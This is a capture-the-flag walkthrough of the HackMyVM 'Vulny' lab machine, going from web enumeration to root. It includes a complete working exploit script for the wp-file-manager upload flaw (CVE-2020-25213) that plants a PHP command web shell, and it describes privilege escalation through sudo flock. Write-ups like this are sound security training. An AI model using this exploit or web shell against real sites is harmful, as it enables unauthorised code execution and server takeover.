Walkthrough HackMyVm - Vulny

# Walkthrough HackMyVm - Vulny ![vulny.PNG](https://hackmd.io/_uploads/HyPkeE9Xp.png) Here I will make a writeup of the Vulny machine on the HackMyVm platform and this is an easy rated VM, if you are interested you can click the link [**here**](https://hackmyvm.eu/machines/machine.php?vm=Vulny). Let's start. ### Reconnaissance As always the first thing i do is port scanning. and at this point nmap only find one open TCP port that is HTTP (80): ```python $ nmap -sC -sV -sT 192.168.1.38 Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-09 03:13 EST Nmap scan report for 192.168.1.38 Host is up (0.0014s latency). Not shown: 999 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.41 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds ``` ### Website ![1.PNG](https://hackmd.io/_uploads/H1ZDWm5ma.png) The website display provided is only the default display, so we need to look for a hidden path or file using bruteforce directory tools such as dirb, dirsearch, etc. ### Directory Bruteforce ```python ─$ dirsearch -u http://192.168.1.38/ --exclude-status 403,401 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Target: http://192.168.1.38/ [04:12:21] Starting: [04:12:49] 200 - 11KB - /index.html [04:12:51] 301 - 317B - /javascript -> http://192.168.1.38/javascript/ [04:13:10] 301 - 313B - /secret -> http://192.168.1.38/secret/ Task Completed ``` Here we find 2 directories, namely `/javascript` and `/secret`. If we access `/javascript` the response given is Forbidden or not permitted. but in the `/secret` directory you can access it and find a note. ![2.PNG](https://hackmd.io/_uploads/H17V47cQa.png) From this information, it is known that there is an endpoint config from WordPress which contains a password/username. but this is quite strange because if we use wappalyzer or wpscan we find no indication that the web server uses wordpress. ![3.PNG](https://hackmd.io/_uploads/HypWPQcQp.png) Next, we try to bruteforce the directory again using dirsearch specifically for the secret path. ```python $ dirsearch -u http://192.168.1.38/secret/ --exclude-status 403,401 _|. _ _ _ _ _ _|_ v0.4.2 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 Target: http://192.168.1.38/secret/ [04:32:45] Starting: [04:33:29] 200 - 7KB - /secret/readme.html [04:33:42] 301 - 322B - /secret/wp-admin -> http://192.168.1.38/secret/wp-admin/ [04:33:42] 301 - 324B - /secret/wp-content -> http://192.168.1.38/secret/wp-content/ [04:33:42] 500 - 610B - /secret/wp-content/plugins/akismet/akismet.php [04:33:42] 500 - 610B - /secret/wp-content/plugins/akismet/admin.php [04:33:42] 200 - 2KB - /secret/wp-content/ [04:33:42] 200 - 1003B - /secret/wp-content/upgrade/ [04:33:42] 200 - 1KB - /secret/wp-content/uploads/ [04:33:42] 301 - 325B - /secret/wp-includes -> http://192.168.1.38/secret/wp-includes/ [04:33:43] 500 - 3KB - /secret/wp-admin/setup-config.php [04:33:43] 500 - 0B - /secret/wp-includes/rss-functions.php Task Completed ``` From these results, 3 paths were found, namely; `/wp-admin` = The response given is the same as `/secret` ![4.PNG](https://hackmd.io/_uploads/SkRcdm5mp.png) `/wp-content` = Response 200 ![5.PNG](https://hackmd.io/_uploads/BJ42uXcma.png) `/wp-includes` = Forbidden ![6.PNG](https://hackmd.io/_uploads/H1NTd797a.png) Next, we can focus on `/wp-content` and in it there is the `/uploads` directory and if we access it we find that this website uses the wp-file-manager plugin. ![7.PNG](https://hackmd.io/_uploads/SJ5Ltm9ma.png) ### Web Exploitation If we access http://192.168.1.38/secret/wp-content/uploads/2020/10/ You will find the version of wp-file-manager, namely 6.0. and this version [**vulnerable**](https://www.exploit-db.com/exploits/51224) ! ![8.PNG](https://hackmd.io/_uploads/ryqAKm5XT.png) We need to download the exploit and make small changes to the location of the url by adding `/secret`. ```python #!/usr/bin/env # Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE # Date: [ 22-01-2023 ] # Exploit Author: [BLY] # Vendor Homepage: [https://wpscan.com/vulnerability/10389] # Version: [ File Manager plugin 6.0-6.9] # Tested on: [ Debian ] # CVE : [ CVE-2020-25213 ] import sys,signal,time,requests from bs4 import BeautifulSoup #from pprint import pprint def handler(sig,frame): print ("[!]Saliendo") sys.exit(1) signal.signal(signal.SIGINT,handler) def commandexec(command): exec_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php" params = { "cmd":command } r=requests.get(exec_url,params=params) soup = BeautifulSoup(r.text, 'html.parser') text = soup.get_text() print (text) def exploit(): global url url = sys.argv[1] command = sys.argv[2] upload_url = url+"/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" headers = { 'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww", 'Connection': "close" } payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--" try: r=requests.post(upload_url,data=payload,headers=headers) #pprint(r.json()) commandexec(command) except: print("[!] Algo ha salido mal...") def help(): print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"") print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id") if __name__ == '__main__': if len(sys.argv) != 3: help() else: exploit() ``` Then run the script. ![9.PNG](https://hackmd.io/_uploads/S1V7o79mT.png) Here we managed to get the shell, next we need to get the reverse shell. ![10.PNG](https://hackmd.io/_uploads/B11TjQ9QT.png) After getting the reverse shell, we need to check the config file to find the user/password like the hint given in `/secret` earlier. ![11.PNG](https://hackmd.io/_uploads/ryW92Qqm6.png) > idrinksomewater A password was found, and we checked in /etc/passwd there was a user `adrian`. and we can assume that this password belongs to Ari `Adrian`. ### Initial Access Login as `adrian` and the password you obtained earlier. and here we have successfully entered. ![12.PNG](https://hackmd.io/_uploads/B1OBR7qQT.png) We need to do is check whether the user can exercise sudo access rights or not and to display a list of permitted commands with the command `sudo -l` ![13.PNG](https://hackmd.io/_uploads/rJqR0XqQT.png) There is a binary flock and we can use it to carry out [**privilege escalation**](https://gtfobins.github.io/gtfobins/flock/). ![14.PNG](https://hackmd.io/_uploads/SyO414cQa.png) And root was successfully obtained. Vulny pwned! ![15.PNG](https://hackmd.io/_uploads/SkNjk49m6.png)